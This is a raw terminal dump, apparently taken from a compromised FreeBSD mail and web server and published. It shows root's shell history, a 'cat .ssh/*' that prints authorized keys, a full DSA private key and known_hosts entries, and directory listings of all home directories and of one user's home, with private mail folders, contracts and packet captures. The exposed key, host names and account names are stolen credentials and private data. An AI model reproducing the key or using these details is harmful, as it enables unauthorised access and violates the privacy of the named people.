unalias vi
vi index.html
vi /usr/local/etc/apache22/httpd.conf
cd /usr/local/www/
ls
ls
cd data/
ls
cd ..
vi index.html
fg
apachectl graceful
cd /export/www/
ls
vi /usr/local/etc/apache22/httpd.conf
apachectl graceful
cd colo.pmjm.com/
ln -s /home/jaymi/public_html/jaymi_photos.tgz .
ls
vi index.html 
nslookup photos.jayzendesigns.com
nslookup jayzendesigns.com
nslookup 67.205.60.48
nslookup 208.97.187.239
cd /export/www/johnzentner.com/
ls
scp -r index.html jaymi@professorx.dreamhost.com:johnzentner.com/
scp -r images jaymi@professorx.dreamhost.com:johnzentner.com/
%ls -la
total 1016
drwxr-xr-x   7 root  wheel    1024 May 10 07:08 .
drwxr-xr-x  22 root  wheel    1024 May  5 20:47 ..
-rw-------   1 root  wheel     108 Sep 28  2006 .Xauthority
-rw-------   1 root  wheel    8791 Jun 29 06:47 .bash_history
-rw-r--r--   1 root  wheel     789 Oct  3  2006 .bashrc
drwxr-xr-x   5 root  wheel     512 Sep  4  2007 .bittorrent
-rw-r--r--   2 root  wheel     786 Jul 22  2008 .cshrc
-rw-------   1 root  wheel    2217 Jul 13 15:34 .history
-rw-r--r--   1 root  wheel     143 Nov  3  2005 .k5login
-rw-------   1 root  wheel     174 Feb 17 16:02 .lesshst
-rw-r--r--   1 root  wheel     293 Nov  3  2005 .login
-rw-------   1 root  wheel    1396 Sep  5  2008 .lsof_pmjm
-rw-------   1 root  wheel    5872 May 10 07:08 .mysql_history
-rw-r--r--   2 root  wheel     253 Jul 22  2008 .profile
-rw-------   1 root  wheel    1024 Feb 17 16:05 .rnd
drwx------   2 root  wheel     512 Nov  6  2008 .ssh
-rw-r--r--   1 root  wheel   36086 Jul 24  2008 logo-thelivingend.gif
drwx------   2 root  wheel     512 Oct  9  2006 mail
-rw-r--r--   1 root  wheel      80 Jul 24  2008 modules.txt
-rw-r--r--   1 root  wheel   25008 Jul 22  2008 pkgs
-rw-r--r--   1 root  wheel   10380 Jul 22  2008 portmaster-list
-rw-r--r--   1 root  wheel      45 Jul 22  2008 ports-byhand
-rw-r--r--   1 root  wheel     811 Sep 14  2007 queue-by-email.pl
-rw-r--r--   1 root  wheel     811 Sep 14  2007 queue-by-from.pl
-rw-r--r--   1 root  wheel     815 Sep 14  2007 queue.pl
-rw-r--r--   1 root  wheel    1565 Sep 14  2007 remove-queue-by-email.pl
drwxr-xr-x   2 root  wheel     512 Jul  9  2008 ventrilo_srv
-rw-r--r--   1 root  wheel  148042 Nov 14  2008 ventrilo_srv-3.0.2-FreeBSD-i386.tar.gz
-rw-r--r--   1 root  wheel  208458 May 29  2008 ventrilo_srv-3.0.2-Linux-i386.tar.gz
drwxr-xr-x   2 500   500       512 Nov 19  2007 ventsrv
%cat .ssh/*
ssh-dss
AAAAB3NzaC1kc3MAAACBAPIdIVk8OzaPgMdWSWHwLAeuzGrXA3XUnmT/5AKqVOA2shN0f1hSZ9LNVmG
aX4N/WLsVXkUIsL2aoq09Iq5HuCyqQGLdt4d64jOcNNtv+eRcIutSO4oEqu9/SmeeuXJ0bClyeLYvT9
WTD11tQYw3wv+WdOATd8T3EgJ06RMZfCDpAAAAFQDbmyaf4ZLGfBfqZww2dJxjeig+iQAAAIAVon040
L4PmVbd0K1bvJLhNGpjnvtYRK61AZgvSwsJzu3QPSmv+6d5/xIlKGTbtk/CfapWKktUPS4EProhko79
nyZsOYeK/rzQQqMabMVsl6p+HoJILOQDvdk4rFvSmZ3CrxC7PB19smPP+9/adUPFXH1bw6zVXbCda+t
PAZ9+kQAAAIEA6/jKovlWI5862/bfnBoeFcVAF0L8H3ACdNfIp5AJZxJjp44eJFdVpLduZToc+NXXmJ
FtPc31JBWSd43HLyK3VpVMymOjxJ2Z7ec4dnAjQymQQ6RxQrXy/bxtG3uyLT/SlDhg+HYKa2gIWiDyO
7he3kS/Iq1PNXn3SJPyjItIc08= root@mail.pmjm.net
ssh-dss
AAAAB3NzaC1kc3MAAACBAOHD2a5BTbjF0ZgdPJDvdHBF8mPUUm9xsZ0x6lLn1bxp1tgZecaBlRVFY72
zT81wMDQ4vHsPv7KGkX6+CTu/cAFrCLQesU6g2IRbzQwDSsD10GxUMwX9CPONWpNgF7qeZwWK7UhaIL
qEsIyKy36lkPuQRd0N9AlJURBhsyT15Sh5AAAAFQC52vI+Ivva/7ZAu4pIw7E7Ow6C5QAAAIEA05nnL
BvwleDrFul39TWVL1KZGewJCy7zQfynJvdB1T43v0VTpNOFXKga+TyawniW38uYQWOWiygpR/wgOosk
/8GGiqolXPAy6ft28sn1pa4nYVD31UXHYYLSCWpX/egm4ftD+gI8hDNs+vKLhbnca+5jygzusxz5RPa
FUDzbsBkAAACBAJHFjq2ledzJSTcg1RPMd599CY8cMlEIP2EHgSOugE2brTWkxZGSwTjkzxzEnebEHc
aHXUCEsFERY8uJ24mWdaZuKNT/+Renr/771ygWKPP6KOcS+sRtljdG/rplGmbEDyXZB4+ppf5bEnaGg
0/eoYIJtJjxI7PXGI1wW41Vtde4 ehampshi@yourmom.cisco.com
ssh-dss
AAAAB3NzaC1kc3MAAACBAJ5aBFavFNEIO/0Ut0dp5a/tPd3RevxwhvEn1fmzEtKntlhq56CAGrCrOgO
3VmrLBVGiZJf1+xTziJxj0pOJdigOj4SYSFuVeRcgh6vv28gf7yOJ+l+liwcZKepV0c53riV/FgODXc
8QzkLHMb74IjEGKxwA/LZyge51vh2N8VOxAAAAFQCmy5hpwf74M7J0BgXxPKj6C3xQAwAAAIAvPjmgf
GN5VkMBObu/wX8Y2WzDEzKDXqS+GNQHhc/baH8ui1kl6pAqlXWznY1TA7sjFW9+TGFXnEM+UfB2dWmJ
RJX5BGpJ3Yvq5CtbW0pwu+FOwOKtg5wYSYuNgmfrujvcXVsAsvmdpMwowAhbD7ke6G98aGjdGPAfPv7
v2FM8jwAAAIEAkokWe8uvkEMVRTxuWN28l3+ZGCTrKCPg3/OJbBaoPdjz5J2b2A0Fwln5pfpLg+3UDW
6GCRNImS/S00VBwH857COYtjzygZwm1d7gFbU9kCiKCVsLvv+ze+9DFLVqwbJcASLPRVyC/8G6oTWq3
hpumFPxJ3dyyYrKYRTxNIgv9Cg= root@yourmom.dhs.org
ssh-dss
AAAAB3NzaC1kc3MAAACBAMxINpxOYd8h/Wvj73sRIWDH4Ed3lCzRhI6Wvms6vw8NIyp6mfbXye+2aMw
Pso4n9gT76C8ocoU/uowL46INmyQAvk0bhSXD6Mto/HO2eHGxNvCyRP5wlKW168DD/xhNtFeexJfBlI
B+HmgUGtjD5mFQknjxB8sNqoZvLgyRie9jAAAAFQDDzZGZxx+zgvEam5G4ams6Vvd+gwAAAIEAyWEtB
FrAhSh9G9QqN7AwUZyAh2N/CwBifEuhJcIoy9NKPijlTtlafRJQd1DdATCuFHvrggC304EGXUC4/dSk
wY+uaWwy/+85TbKCuwC4IbvFqkEWF+mZ0tG/2Zx/hRQY9+766iPTa1tUrCocqRzErCa7iB6Kp40D/cU
R0bvi7HwAAACBALzDvjEz55xnPnLz9lKg5h6hedN28KocEzG/2kgWbepFv/pO8zhPryMYS4t+Ve7+Ns
5ohGdR1TOP8yw6Zuq3uSRBiXvOFbVy8feh8ZpbxYpRTZWCOd+vzSPQwJLqjFZdOaMVurbwECNinau7B
K1xxb1H90GVoPlO6rWQF4uSC6yg root@bsd.yourmom.dhs.org
ssh-dss
AAAAB3NzaC1kc3MAAACBAIde1/OdSV0PlVBQMg1hu0ViHg7MdK8vzYN/ZsqF45Imc6Xov6P7+nTh3/l
TbAcE+rF81/m/rxazLfFx3jHIvzvMru2cLAg8YrGnrAnFwR8dniglzPf4sJJqc0mOh4iLZv9LzPzjxg
Q68VtfQ0wjWltPJ2i7EZmp1S75u23dm9snAAAAFQCLkkbU/P0946kdI0ldQd1OvtEdAQAAAIEAhCzM9
zDXdVoAXKYtU4iXy1MeEz/00HcfIpmzLfEN3tgSpycg0FP3/box1SKebDxymUPTw4PQ03PxMH4sQKpy
1rG5uXT01IQAoyvlVOfa9dQTuPzTEeKCPVY9cFF3Ft/uOzMhDedoB+OSomPDBiSqDft34mhhvn3T7bC
GCwb/No8AAACABtgyhSRBJIW+lJmlqCAAGYmdfNExPU64WEJ4nMB5U5Y2tbsZN1ZzMe0RoktjSuvBEn
O9SXZDtaRRLmVJwqo3LU16lx9YUhS6LpsdBTwHADfcO29Ti346vvTTcQrMf9bAG35lWmteUdvx79B2U
dZNccka63bOGHBMykX9kSwL6W0= root@pmjm
ssh-dss
AAAAB3NzaC1kc3MAAACBANZz1pGeGxfi1hn6seIFHQI+8rq+B/ZIE/1IJ03Rz6MZRD49hKZIw3g/WH+
F+2lrGraSXJl5MPyr5Ig+ZoBKvPV91sRYwxkhqxvlhI6a+l/wG/jeFzA/G4nMipw3hjEyC7jRFU2UAi
tAp/EAznbBOyPFFRcMLbQx85r3QenszEEpAAAAFQDGLWOj9IAc0Kbd2KqcC1eOES3AVQAAAIAK1xdhe
X58yhJIDIhICsn+NNvgk4NB+XcXVUeHb/qsLwh63JK4xaVqlO5yeJ0oLET+Krr3W0nXXjFV77FTEMet
JFub7cIPwAyN5l1Gq1hK6VUvbqEHwUkLmXORpZgccXRaGTlcDcoZtrNebRO5hjQ+ZHn+qhOpWk1/OVl
ef/gWuQAAAIA1yiO2pF2DwCtbns1HGW+UyHQSZPcZxf2JfFoBGvJkUWt4tSJ2VP+kDbMwoEHZlXcXtt
Idh81FZkYLKN87xsanO6ALTsfAtl34sdvGFZu0JKHjhZ1Z9s5iQq1fdbsRPMMKStLF2g2oUaxag+hnU
+nVUo7U7oY9vqQ7YHcHiZZ4WA== root@mail.pmjm.net

-----BEGIN DSA PRIVATE KEY-----
MIIBuwIBAAKBgQCHXtfznUldD5VQUDINYbtFYh4OzHSvL82Df2bKheOSJnOl6L+j
+/p04d/5U2wHBPqxfNf5v68Wsy3xcd4xyL87zK7tnCwIPGKxp6wJxcEfHZ4oJcz3
+LCSanNJjoeIi2b/S8z848YEOvFbX0NMI1pbTydouxGZqdUu+btt3ZvbJwIVAIuS
RtT8/T3jqR0jSV1B3U6+0R0BAoGBAIQszPcw13VaAFymLVOIl8tTHhM/9NB3HyKZ
sy3xDd7YEqcnINBT9/26MdUinmw8cplD08OD0NNz8TB+LECqctaxubl09NSEAKMr
5VTn2vXUE7j80xHigj1WPXBRdxbf7jszIQ3naAfjkqJjwwYkqg37d+JoYb590+2w
hgsG/zaPAoGABtgyhSRBJIW+lJmlqCAAGYmdfNExPU64WEJ4nMB5U5Y2tbsZN1Zz
Me0RoktjSuvBEnO9SXZDtaRRLmVJwqo3LU16lx9YUhS6LpsdBTwHADfcO29Ti346
vvTTcQrMf9bAG35lWmteUdvx79B2UdZNccka63bOGHBMykX9kSwL6W0CFDbp33kB
xw6DxCinOr0mvqMUhGOT
-----END DSA PRIVATE KEY-----
ssh-dss
AAAAB3NzaC1kc3MAAACBAIde1/OdSV0PlVBQMg1hu0ViHg7MdK8vzYN/ZsqF45Imc6Xov6P7+nTh3/l
TbAcE+rF81/m/rxazLfFx3jHIvzvMru2cLAg8YrGnrAnFwR8dniglzPf4sJJqc0mOh4iLZv9LzPzjxg
Q68VtfQ0wjWltPJ2i7EZmp1S75u23dm9snAAAAFQCLkkbU/P0946kdI0ldQd1OvtEdAQAAAIEAhCzM9
zDXdVoAXKYtU4iXy1MeEz/00HcfIpmzLfEN3tgSpycg0FP3/box1SKebDxymUPTw4PQ03PxMH4sQKpy
1rG5uXT01IQAoyvlVOfa9dQTuPzTEeKCPVY9cFF3Ft/uOzMhDedoB+OSomPDBiSqDft34mhhvn3T7bC
GCwb/No8AAACABtgyhSRBJIW+lJmlqCAAGYmdfNExPU64WEJ4nMB5U5Y2tbsZN1ZzMe0RoktjSuvBEn
O9SXZDtaRRLmVJwqo3LU16lx9YUhS6LpsdBTwHADfcO29Ti346vvTTcQrMf9bAG35lWmteUdvx79B2U
dZNccka63bOGHBMykX9kSwL6W0= root@central.int.pmjm.org
pmjm.com ssh-dss
AAAAB3NzaC1kc3MAAACBALGVYHAJYr0DR4QX2YLhARTk0WW8HVnnR1xOIC6JeZbk89CM5F6P8VJKq2a
hMkmGQkIqZtVvdmvjmfhxaTUS8lXtCM5rLO94yz7bgMrWtaoZTXCnEA1aBzhW3YMD/2ByPlJU2lO0Qe
h09HFgIAquSYbCEYFE5lGVP5LTT5W1Y8SlAAAAFQC7x95hEymD5hB3jY+1zD6DfWcX5QAAAIBnqp1PQ
WU0E3SiYzKB6lKqYm9rzh8ogkHcN6mBpW0kODNETt0xW5vXhE5hP83qX9ZF4WpCl6TSdmI72h8hOq48
jhUzqhuoqGepFYXlDUTK4LxzD77YRB2lohP+/eVkLKmzv5IevbOzAJFU98E207u9nIZnnYtEbRYy8oS
khLbrDQAAAIEApkzPne/BmYH9h8pW0YAVxu4uM1j4QjsS0UrytJYPQKmPCgxUoypI/LYFB1yqZ1pzFw
AjBhXUFENQuJ/Lmf8smtyt+ETUrUSsakPtEOuNq5+SHHXsyGNERDm455Su+cMu2+W4+/36Kq53TAYN7
YtggKFrh6DcqEl8rELCK6ytlYc=
old.pmjm.com ssh-dss
AAAAB3NzaC1kc3MAAACBALGVYHAJYr0DR4QX2YLhARTk0WW8HVnnR1xOIC6JeZbk89CM5F6P8VJKq2a
hMkmGQkIqZtVvdmvjmfhxaTUS8lXtCM5rLO94yz7bgMrWtaoZTXCnEA1aBzhW3YMD/2ByPlJU2lO0Qe
h09HFgIAquSYbCEYFE5lGVP5LTT5W1Y8SlAAAAFQC7x95hEymD5hB3jY+1zD6DfWcX5QAAAIBnqp1PQ
WU0E3SiYzKB6lKqYm9rzh8ogkHcN6mBpW0kODNETt0xW5vXhE5hP83qX9ZF4WpCl6TSdmI72h8hOq48
jhUzqhuoqGepFYXlDUTK4LxzD77YRB2lohP+/eVkLKmzv5IevbOzAJFU98E207u9nIZnnYtEbRYy8oS
khLbrDQAAAIEApkzPne/BmYH9h8pW0YAVxu4uM1j4QjsS0UrytJYPQKmPCgxUoypI/LYFB1yqZ1pzFw
AjBhXUFENQuJ/Lmf8smtyt+ETUrUSsakPtEOuNq5+SHHXsyGNERDm455Su+cMu2+W4+/36Kq53TAYN7
YtggKFrh6DcqEl8rELCK6ytlYc=
ssh.cisco.com ssh-dss
AAAAB3NzaC1kc3MAAACBAKi4nala0B/u0CNGzXwfMmBUFmYkQStxKnVWEmArrLhPA2dxcIFLJd9NjbY
e6Hzv6p6EwuCCFxqzz3wqzeagKXJonkUTOSwgRNlGuGiLQzEP5q4+mchsCQhv5tQqPqC+nwfSoRBLar
fJYBew5Q5c7/J1E6g+/1YV+D6qjzB2L1HxAAAAFQC2W5o6EsnZGRoQC5ysAy1rgMc8qQAAAIB71JCO4
4AenIwidqFEMi034zxtIdwZYy40yDL83+qjkw9LsbPTpOVy+Pt6j7nr2OP9/mKLHWMNxnC03qmCc6e6
4/ELeXMVMpSvr15neOchVNHmFk6OZwJQ2KS1iaWUU8E7h/a/+CgARMRDdznltZlGLdQhB8AxiP+M4ah
sPJqXvwAAAIATBntMqCjj8p6lNZKAiOImumrdk3FvTcEckaOw8pZxbk4V4CKxwTbjhVczuseSS2GjVR
C4ZgU0jStWdTrKE/5KEEwhcw8b7X3DxO2ooJVrLRopgEKCg4uMxdbo7yJZSH/gqhRcpXQtwNOAxzCnx
n8YsTN3HnBx2tVAyiR4hDQP6Q==
[216.127.35.68]:443 ssh-dss
AAAAB3NzaC1kc3MAAACBALVkZMTCjqiXbe7p07TTYRGEI9aLy2LuX2I1l0CTPqHIkY31k0zJVW85EKl
Dv4EXx8WISzb+u2/QTVplyU6nevvxjdWbCr7STwu/waP5RnVdGw0JgonJd8JIup6OM705/GFeXliOl4
fOEkrjdvXPtMSVJ4MAotPCguLNxQZrY7WZAAAAFQDMPIQKwOkpUw/EoyciAjs/M5asfwAAAIBbBuLNO
1fYr3FQvpnSPBSHgfK5X+RoLNMGA0vpohjW/gGH79c4h0qq/pzGhYulZJotJKwyKM5p+jGfTz4bkU4o
OqXGpDnM+0R5LsyUFCTppMu8pgMGLiU+71dgTgOaCF4E3FA2crnaTvTEbb2g4ijuiNrmUrIbkZRv8RC
03ruWDgAAAIEAiadT7a0nFG9Vmf7EDvAWi+/69HcIYUfqZcCt1XipKiwSFBvfvg2c7AUlwEB+kF5iCo
j7AygIKFiH4wczj372k47oJV2UBvtk8SIpZusQURWKOmadwPr3Vno3fh8tP41gj2X94fIHhth3JNv+8
/jRBk5sTalZaNyjg4Im7aqmsIA=
professorx.dreamhost.com,67.205.61.213 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEA6P9Hlwdahh250jGZYKg2snRq2j2lFJVdKSHyxqbJiVy9VX9gTkN
3K2MD48qyrYLYOyGs3vTttyUk+cK++JMzURWsrP4piby7LpeOT+3Iq8CQNj4gXZdcH9w15Vuk2qS11a
t6IsQPVHpKD9HGg9//EFUccI/4w06k4XXLm/IxOGUwj6I2AeWmEOL3aDi+fe07TTosSdLUD6INtR0cy
Ksg0zC7Da24ixoShT8Oy3x2MpR7CY3PQ1pUVmvPkr79VeA+4qV9F1JM09WdboAMZgWQZ+XrbtuBlGsy
hpUHSCQOya+kOJ+bYryS+U7A+6nmTW3C9FX4FgFqTF89UHOC7V0zZQ==
%cd /home
%ls -la
total 144
drwxr-xr-x  33 root         wheel       1024 Jul 13 14:24 .
drwxr-xr-x  24 root         wheel        512 Jul 23  2008 ..
drwxr-xr-x   3 admin        admin        512 May 28  2004 admin
drwxr-xr-x   8 andyw        andy        1024 Sep  4  2006 andyw
drwxr-xr-x   2 bmondala     bmondala     512 Mar 20  2008 bmondala
drwxr-xr-x   2 bre          bre          512 Aug 19  2007 bre
drwxr-xr-x   7 1016         ciagon      1024 Aug 21  2006 ciagon
drwxr-xr-x   3 crystal      crystal      512 Mar 21 09:33 crystal
drwxr-xr-x   3 d            d            512 May 10 12:11 d
drwxr-xr-x   2 dakami       dakami       512 May 10 11:57 dakami
drwxr-xr-x   2 dante        dante        512 May 21  2005 dante
drwxr-xr-x   3 dire         dire         512 May 11 09:39 dire
drwxr-xr-x   2 dmktest      dmktest      512 Apr 25  2006 dmktest
drwx------  68 effugas      wheel       5120 Jul 17 11:43 effugas
drwxr-xr-x  42 1009         effugas_nr  2560 Jun 29 12:26 effugas_nr
drwxr-xr-x   6 ginray       ginray      1024 Feb 11  2006 ginray
drwxr-xr-x   4 gir          wheel        512 Sep  1  2008 gir
drwxr-xr-x   7 hampshir     hampshir     512 Sep 14  2007 hampshir
drwxr-xr-x   6 ice          wheel       1024 Jul 17 09:18 ice
drwxr-xr-x   3 jay          jay          512 Aug 16  2006 jay
drwxr-xr-x   3 jaymi        jaymi        512 Nov 12  2008 jaymi
drwxr-xr-x   6 mooseaccess  jb           512 Apr  6  2004 jb
drwxr-xr-x   7 jcrossley    jcrossley   1024 Mar  2 09:30 jcrossley
drwxr-xr-x   2 jeff         jeff         512 May 12  2006 jeff
drwxr-xr-x   3 jenicole     jenicole     512 Jan 30  2008 jenicole
drwxr-x--x  14 jmondala     jmondala    2048 Jul 20 00:01 jmondala
drwx------  15 karin        karin       1536 Apr 21  2008 karin
drwxr-xr-x   2 mooseaccess  wheel        512 Oct  7  2008 mooseaccess
drwxr-xr-x   4 pig          pig          512 May  9 14:59 pig
drwxr-x---   7 psm          pmjm        1536 Jul 13 15:34 psm
drwxr-xr-x   7 tom          tom         1024 May 17  2006 tom
drwxr-xr-x   3 tomstdenis   tomstdenis   512 Feb 20  2006 tomstdenis
drwxr-xr-x   4 ventrilo     ventrilo     512 Nov 14  2008 ventrilo
%cd effugas
%ls -la
total 7437192
-rw-r--r--   1 effugas  wheel         53 Mar 10  2005 +COMMENT
-rw-r--r--   1 effugas  wheel        490 Mar 10  2005 +CONTENTS
-rw-r--r--   1 effugas  wheel        307 Mar 10  2005 +DESC
-r--r--r--   1 effugas  wheel      13080 Mar 10  2005 +MTREE_DIRS
-rw-r--r--   1 effugas  wheel    1299747 Jul 16  2005 -
-rw-r--r--   1 effugas  wheel          0 Sep 28  2005 -u
drwx------  68 effugas  wheel       5120 Jul 17 11:43 .
drwxr-xr-x  33 root     wheel       1024 Jul 13 14:24 ..
-rw-------   1 effugas  wheel        434 Jan 13  2008 .Xauthority
-rw-r--r--   1 effugas  wheel          0 Oct 24  2006 .addressbook
-rw-------   1 effugas  wheel       2285 Oct 24  2006 .addressbook.lu
-rw-------   1 effugas  wheel      12839 Jul 18 06:18 .bash_history
drwxr-xr-x   7 effugas  wheel        512 Jun 13  2008 .bittorrent
drwxr-xr-x   6 effugas  wheel        512 Feb  6 14:05 .cpan
drwx------   2 effugas  wheel        512 Apr 23  2005 .elinks
drwx------   2 effugas  jb           512 Sep 24  2005 .elm
-rw-r--r--   1 effugas  wheel      63520 Sep 29  2005 .fonts.cache-1
drwx------   4 effugas  wheel        512 Feb 15  2006 .gaim
drwx------   2 effugas  wheel        512 Mar 19 00:41 .gnupg
-rw-------   1 effugas  wheel     302298 Dec 30  2005 .grepmail-cache
-rw-------   1 effugas  wheel         67 Jul  6  2008 .lesshst
-rw-r--r--   1 effugas  wheel        133 Jun 10  2006 .mailboxlist
-rw-------   1 effugas  wheel       7465 Jun  3 06:23 .mysql_history
-rw-------   1 effugas  wheel        221 Sep 10  2004 .nessusrc
-rw-r--r--   1 effugas  wheel      28672 Sep  2  2004 .nomde_ex.pl.swo
-rw-r--r--   1 effugas  wheel      16384 Sep  7  2004 .nomde_ex.pl.swp
drwx------   8 effugas  wheel        512 Dec  5  2005 .openwebmail
-rw-------   1 effugas  wheel       1592 Apr 20 19:28 .pine-interrupted-mail
-rw-------   1 effugas  wheel      17165 Jul 17 11:38 .pinerc
-rw-r--r--   1 effugas  wheel        816 Jan  8  2006 .procmailrc
-rw-------   1 effugas  wheel       1024 Jan  7  2009 .rnd
-rw-r--r--   1 effugas  wheel         12 Apr  4  2005 .slirprc
drwx------   2 effugas  wheel        512 Jul 12 14:02 .spamassassin
drwxr-xr-x   2 effugas  wheel        512 Nov  9  2005 .ssh
drwxr-xr-x   3 effugas  wheel        512 Jun 23  2007 .subversion
-rw-------   1 effugas  jb           256 Dec  5  2005 .vacation.msg
drwxr-xr-x   2 effugas  wheel        512 Sep 29  2005 .vnc
-rw-r--r--   1 effugas  wheel       5714 Sep  5  2007 110eclipse.jpg
-rw-r--r--   1 effugas  wheel       5714 Sep  5  2007 110eclipse.jpg.1
-rw-r--r--   1 effugas  wheel    4170702 Dec 17  2006 17-Day tripper.mp3
-rw-r--r--   1 effugas  wheel      18163 Oct 10  2006 399299
drwx------  11 effugas  wheel       2048 Jan 14  2007 4
-rw-------   1 effugas  wheel    1244999 Jul 25  2005 Admin Noise
-rwx------   1 effugas  wheel      19253 May 20  2007 Alpha Man Conversation & Persuasion.torrent
drwxr-xr-x   7 effugas  wheel        512 Jun 14  2008 BitTorrent Downloads
drwxr-xr-x  11 root     wheel       1024 Jan 13  2007 BitTorrent-4.20.9
-rw-------   1 effugas  wheel    9215553 Aug 12  2006 CCCP
-rw-r--r--   1 effugas  wheel     136192 Aug 12  2007 Cingular_Customized APN info and price sheet.doc
-rw-------   1 effugas  wheel   11072756 Sep 15  2006 Crypto
-rwx------   1 effugas  wheel      18865 Nov  4  2006 David X Seduction and Relationships Seminar.torrent
-rw-r--r--   1 effugas  wheel      64512 Jan  6  2006 DiogeNeS.doc
-rw-r--r--   1 effugas  wheel      27648 May 10 13:01 Doxpara-NDT term sheet.doc
-rw-------   1 effugas  wheel     425406 Jul 25  2005 Drafts
-rw-r--r--   1 effugas  wheel      27648 Aug 12  2007 Encryption sw_SecurStar info.doc
lrwxr-xr-x   1 effugas  wheel         29 Jan  8  2006 Funsec -> /usr/home/effugas/mail/Funsec
-rw-------   1 effugas  mail    10369669 Sep 25  2005 Gap
-rw-------   1 effugas  wheel        496 Sep 30  2005 INBOX.Drafts
-rw-------   1 effugas  wheel     324536 Nov 18  2005 INBOX.Sent
-rw-------   1 effugas  wheel        496 Sep 30  2005 INBOX.Trash
-rwx------   1 effugas  wheel      20767 Oct 24  2006 Juggler - Charisma Arts Bootcamp.avi.torrent
-rw-r--r--   1 effugas  wheel  403486571 Jul 13  2006 Junk
-rw-r--r--   1 effugas  wheel  379402660 Nov 17  2005 Junk_toobig
-rw-------   1 effugas  wheel  280301055 Aug 21  2006 Known
drwxr-xr-x   2 effugas  wheel        512 Sep 26  2005 MT-3.2-en_US
-rwx------   1 effugas  wheel    1377924 Sep 26  2005 MT-3.2.tar.gz
drwxrwxrwx   2 effugas  jb           512 Sep 24  2005 Mail
-rw-r--r--   1 effugas  wheel       1438 Oct  4  2006 Makefile
-rw-------   1 effugas  wheel  229972323 Sep 21  2006 Older Mail
-rw-------   1 effugas  wheel  181797360 Jul 25  2005 Orig_Older
-rw-------   1 effugas  wheel        492 Jul 25  2005 Outbox
-rw-r--r--   1 effugas  wheel     200578 Aug 12  2007 PhoneCrypt_docs_pc.pdf
-rwx------   1 effugas  wheel      28554 Nov 18  2006 PickUp 101 - He Said, She Said - Volume 1.torrent
drwxr-xr-x   2 effugas  wheel        512 Oct  2  2005 PyFlickrUploadr
-rw-r--r--   1 effugas  wheel       7164 Oct  2  2005 PyFlickrUploadr.tar.gz
lrwxr-xr-x   1 effugas  wheel         31 Jan  8  2006 RouteSec -> /usr/home/effugas/mail/RouteSec
-rw-r--r--   1 effugas  wheel    1352443 Mar  1  2008 Secret of Mana.zip
-rw-------   1 effugas  wheel  144765683 Jul 26  2006 Sent
-rw-------   1 effugas  wheel   68609225 Jul 25  2005 Sent Items
-rw-r--r--   1 effugas  wheel          0 Sep 25  2005 Spam
-rw-r--r--   1 effugas  wheel   55823056 Aug 10  2006 Trash
drwxr-xr-x   2 effugas  wheel        512 Oct 28  2005 ack
drwxr-xr-x   2 effugas  wheel       1024 Aug  8  2007 airhook-2
-rw-r--r--   1 effugas  wheel      28282 Apr 14  2003 airhook-2.tar.gz
drwxr-xr-x   2 effugas  wheel        512 Sep  8  2008 ap
drwxr-xr-x   2 effugas  wheel       1536 Feb 21  2008 arse
-rw-r--r--   1 effugas  wheel        614 Jan 19  2005 authorized_keys
-rw-r--r--   1 effugas  wheel       8048 Jan 23  2006 av2.txt
-rw-r--r--   1 effugas  wheel       2641 Oct  6  2006 back.pem
drwxr-xr-x   2 effugas  wheel       1024 Jul 25  2006 bin
-rw-r--r--   1 effugas  wheel       1801 Feb 23  2008 boing_seq.txt
-rwx------   1 effugas  wheel     214576 Jul 25  2006 bplex_0_dev-src.gz
-rw-r--r--   1 effugas  wheel       1662 Sep  8  2008 browserRedirect?url=itms%3A%2F%2Fax.phobos.apple.com.edgesuite.net%2FWebObjects%2FMZStore.woa%2Fwa%2FviewGenre%3Fid%3D35
drwxr-xr-x   2 effugas  wheel        512 Jun 11  2006 ca
drwxr-xr-x   2 effugas  wheel        512 Sep 24  2006 cl
drwxr-xr-x  60 effugas  wheel       4096 Jul  6  2008 content
drwxrwxrwx   2 effugas  wheel        512 Jul  8  2008 db
-rw-r--r--   1 effugas  wheel     963360 Sep 26  2005 db.dump
-rw-------   1 effugas  wheel       2416 Apr 27 13:07 dead.letter
-rw-r--r--   1 effugas  wheel        718 Feb 22  2008 del.txt
-rw-r--r--   1 effugas  wheel       4196 Feb 23  2008 del_seq.txt
-rw-r--r--   1 effugas  wheel       4188 Feb 23  2008 del_ts.txt
-rw-r--r--   1 effugas  wheel      10980 Sep 19  2006 dell_ssl2.txt
-rw-------   1 effugas  wheel     815104 Feb 11  2008 dig.core
drwxr-xr-x   2 effugas  wheel       1024 Jul 30  2006 dissoc-0.1
-rw-r--r--   1 effugas  wheel      51652 Jul  2  2001 dissoc-0.1.tar.gz
-rw-r--r--   1 effugas  wheel        193 Oct  4  2006 distinfo
-rwx------   1 effugas  wheel    7211132 Mar 15  2008 dk2_cli.pcap
drwxr-xr-x  33 effugas  wheel       3584 Jul 13 11:47 dl
-rw-r--r--   1 effugas  wheel       4338 Mar 30  2005 dns.cap
-rw-r--r--   1 effugas  wheel       4338 Apr 13 15:23 dns.pcap
-rwx------   1 effugas  wheel    3793316 Jun 15  2006 domain_login_esp.cap
drwxr-xr-x   2 effugas  wheel        512 Dec 23  2008 dprint
-rw-r--r--   1 effugas  wheel  615112704 Nov  5  2006 en_winxp_pro_with_sp2.iso
-rw-r--r--   1 effugas  wheel       1967 Feb 23  2008 fark_seq.txt
-rw-r--r--   1 effugas  wheel       1984 Feb 23  2008 fark_ts.txt
drwxr-xr-x   2 effugas  wheel        512 Oct  4  2006 files
-rw-------   1 effugas  jb        209744 Sep 25  2005 filtered
-rw-------   1 effugas  wheel   37106364 Sep 26  2005 fire_inbox
-rw-r--r--   1 effugas  wheel    7385211 Oct 28  2005 foo.pgp
-rw-r--r--   1 effugas  wheel   10485784 Jun 19  2006 foo.xml
-rw-r--r--   1 effugas  wheel      12920 Feb 22  2008 g_seq.txt
-rw-r--r--   1 effugas  wheel      12848 Feb 22  2008 g_ts.txt
-rw-------   1 effugas  jb       2909341 Jan 12  2006 gah
drwxr-xr-x   9 effugas  wheel       1536 Aug 11  2005 gaim-1.5.0
-rw-r--r--   1 effugas  wheel    6123237 Aug 11  2005 gaim-1.5.0.tar.bz2
-rw-------   1 effugas  wheel    7999488 Sep 29  2005 gaim.core
-rw-r--r--   1 effugas  wheel       1588 Jan  1  2006 ghet_ip.c
drwxrwxr-x   2 effugas  wheel        512 Sep 30  2005 ghetto
drwxr-xr-x   2 effugas  wheel        512 Sep 25  2005 gml
-rwxr-xr-x   1 effugas  wheel       3395 Jun 17  2004 gml.py
drwxr-xr-x   2 effugas  wheel        512 Aug 23  2007 haxedit
